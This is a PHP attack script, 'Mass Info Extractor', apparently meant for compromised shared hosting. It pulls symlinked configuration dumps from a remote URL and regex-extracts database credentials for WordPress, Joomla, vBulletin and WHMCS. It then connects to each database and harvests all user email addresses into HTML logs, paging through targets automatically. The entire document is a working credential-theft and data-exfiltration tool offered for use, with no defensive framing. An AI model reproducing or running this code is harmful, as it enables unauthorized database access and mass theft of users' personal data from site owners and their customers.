Mass Info Extractor (Coded RAB3OUN)

1. <?
2.  
3. $h="<title>Mass Info Extractor (Coded RAB3OUN)</title>
4.  
5. <pre>
6. ___  ___                _____       __      
7. |  \/  |               |_   _|     / _|    
8. | .  . | __ _ ___ ___    | | _ __ | |_ ___  
9. | |\/| |/ _` / __/ __|   | || '_ \|  _/ _ \
10. | |  | | (_| \__ \__ \  _| || | | | || (_) |
11. \_|  |_/\__,_|___/___/  \___/_| |_|_| \___/
12.                                            
13.                                            
14. _____     _                  _            
15. |  ___|   | |                | |            
16. | |____  _| |_ _ __ __ _  ___| |_ ___  _ __
17. |  __\ \/ / __| '__/ _` |/ __| __/ _ \| '__|
18. | |___>  <| |_| | | (_| | (__| || (_) | |  
19. \____/_/\_\\__|_|  \__,_|\___|\__\___/|_|  
20.                                        
21. Coded by RAB3OUN                                 
22. </pre>";   
23. echo $h;                                     
24. $config = "http://site.com/sym/";
25.  ob_start();
26. @set_time_limit(0);
27. $i=0;
28. $list[$i]['name']="Wordpress";
29. $list[$i]['table']="users";
30. $list[$i]['col']="user_email";
31.  
32. $list[$i]['word']="wordpress";
33. $list[$i]['code']='preg_match_all("#\'DB_.*\', \'(.*?)\'#",$file_source , $mysql_info);
34. preg_match_all("#prefix  = \'(.*?)\'#",$file_source , $__prefix);
35. $faconnect=@mysql_connect($mysql_info[1][3],$mysql_info[1][1],$mysql_info[1][2]);
36. $faselect=@mysql_select_db($mysql_info[1][0]);';
37. $i++;
38.  
39. $list[$i]['name']="Joomla";
40. $list[$i]['table']="users";
41. $list[$i]['col']="email";
42.  
43. $list[$i]['word']="JConfig";
44. $list[$i]['code']='
45. preg_match_all(\'#\$host = \\\'(.*)\\\'#\',$file_source , $v1);
46. preg_match_all(\'#\$user = \\\'(.*)\\\'#\',$file_source , $v2);
47. preg_match_all(\'#\$password = \\\'(.*)\\\'#\',$file_source , $v3);
48. preg_match_all(\'#\$db = \\\'(.*)\\\'#\',$file_source , $v4);
49. preg_match_all(\'#\$dbprefix = \\\'(.*)\\\'#\',$file_source ,$__prefix);
50.  
51. $faconnect=@mysql_connect($v1[1][0],$v2[1][0],$v3[1][0]);
52. $faselect=@mysql_select_db($v4[1][0]);';
53.  
54. $i++;
55.  
56. $list[$i]['name']="vBulletin";
57. $list[$i]['table']="user";
58. $list[$i]['col']="email";
59.  
60. $list[$i]['word']="vBulletin";
61. $list[$i]['code']='preg_match_all(\'#\$config\[\\\'MasterServer\\\']\[\\\'servername\\\'] = \\\'(.*)\\\'#\',$file_source , $v1);
62. preg_match_all(\'#\$config\[\\\'MasterServer\\\']\[\\\'username\\\'] = \\\'(.*)\\\'#\',$file_source , $v2);
63. preg_match_all(\'#\$config\[\\\'MasterServer\\\']\[\\\'password\\\'] = \\\'(.*)\\\'#\',$file_source , $v3);
64. preg_match_all(\'#\$config\[\\\'Database\\\']\[\\\'dbname\\\'] = \\\'(.*)\\\'#\',$file_source , $v4);
65. preg_match_all(\'#\$config\[\\\'Database\\\']\[\\\'tableprefix\\\'] = \\\'(.*)\\\'#\',$file_source ,$__prefix);
66.  
67. $faconnect=@mysql_connect($v1[1][0],$v2[1][0],$v3[1][0]) ;
68. $faselect=@mysql_select_db($v4[1][0]) ;';
69.  
70. $i++;
71.  
72. $list[$i]['name']="WHMCS";
73. $list[$i]['table']="tblclients";
74. $list[$i]['col']="email";
75.  
76. $list[$i]['word']="cc_encryption_hash";
77. $list[$i]['code']='preg_match_all(\'#\$db_host = \\\'(.*)\\\'#\',$file_source , $v1);
78. preg_match_all(\'#\$db_username = \\\'(.*)\\\'#\',$file_source , $v2);
79. preg_match_all(\'#\$db_password = \\\'(.*)\\\'#\',$file_source , $v3);
80. preg_match_all(\'#\$db_name = \\\'(.*)\\\'#\',$file_source , $v4);
81. $__prefix="";
82. $faconnect=@mysql_connect($v1[1][0],$v2[1][0],$v3[1][0]) ;
83. $faselect=@mysql_select_db($v4[1][0]) ;';
84.  
85.  
86.  
87.  
88. $x = file_get_contents2($config);
89. preg_match_all('#href="(.*?).txt"#i',$x,$res);
90.  
91. $total=count($res[1])-1;
92. $cj = (isset($_GET['cj']) && $_GET['cj']!='') ? $_GET['cj'] : 0;
93.  
94.  
95.  for($j = $cj; $j <= $cj+50; $j++)
96.     {
97.     $file_name=@$res[1][$j];
98.    
99. if ($file_name=="") {echo("The END");break;}
100.  
101. $file_source = file_get_contents2($config.$file_name.".txt");
102.  echo "<hr>[*] ".$file_name;
103.  echo "<br> $j/$total";
104. // echo $file_source;
105. if ($file_source=="") continue;
106. foreach ($list as $l)
107. {
108.  
109. if(ereg($l['word'],$file_source))
110. {
111.  
112. $mysql_info="";
113. echo "<br>".$l[name];
114.  
115. eval($l[code]);
116.  
117.  
118. $prefix="";
119. if (is_array($__prefix))
120. {
121. if (($__prefix[1][0])<>"") $prefix=$__prefix[1][0];
122. }
123. $table=$l['table'];
124. $col=$l['col'];
125.  
126. $x = @mysql_query("SELECT $col FROM ".$prefix.$table."") ;
127. $t=0;
128.  
129. while($x1 = @mysql_fetch_array($x,1)){
130.  
131. $t++;
132. r($l['name'],$col,$x1,$file_name);
133.  
134.  }
135.  echo "<br> Total mail $t";
136. @mysql_close($faconnect);
137.  
138.  
139.  
140. }
141.  
142. }
143.  
144. }
145. $log=ob_get_contents();
146. $fh2 = fopen("log.html", 'a') ;
147.     fwrite($fh2,$log);
148. fclose($fh2);
149. if ($_GET['cj']<$total){
150. echo '<meta http-equiv="refresh" content="0;URL=?cj='.($_GET['cj']+50).'">' ;
151. }
152.  
153. function r($name,$col,$data,$o)
154. {
155.  
156. $c= "<tr>";
157. foreach ($data as $x=>$y)
158. {
159.  
160. $c.= "<td>$y</td>\n";
161.  
162. // }
163. }
164.  
165. $c.= "</tr>";
166. if (file_exists("$name.html"))
167. {
168.  
169. $fh2 = fopen("$name.html", 'a') ;
170.     fwrite($fh2,$c);
171. fclose($fh2);
172.  
173. }
174. else
175. {
176. $c="<br><table border=1><tr><td>".str_replace(",","</td><td>",$col)."</td></tr>".$c;
177. $fh2 = fopen("$name.html", 'a') ;
178.     fwrite($fh2,$c);
179. fclose($fh2);
180.  
181. }
182. }
183.  
184. function file_get_contents2($url)
185. {
186.  
187.     $ch = curl_init();
188.     curl_setopt($ch,CURLOPT_URL,trim($url));
189.      
190.     curl_setopt($ch, CURLOPT_HEADER, 0);    
191.    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
192.     curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
193.     curl_setopt($ch, CURLOPT_TIMEOUT, 10);
194.     $result = curl_exec($ch);
195.     echo curl_error($ch);
196.     return   $result;
197.     }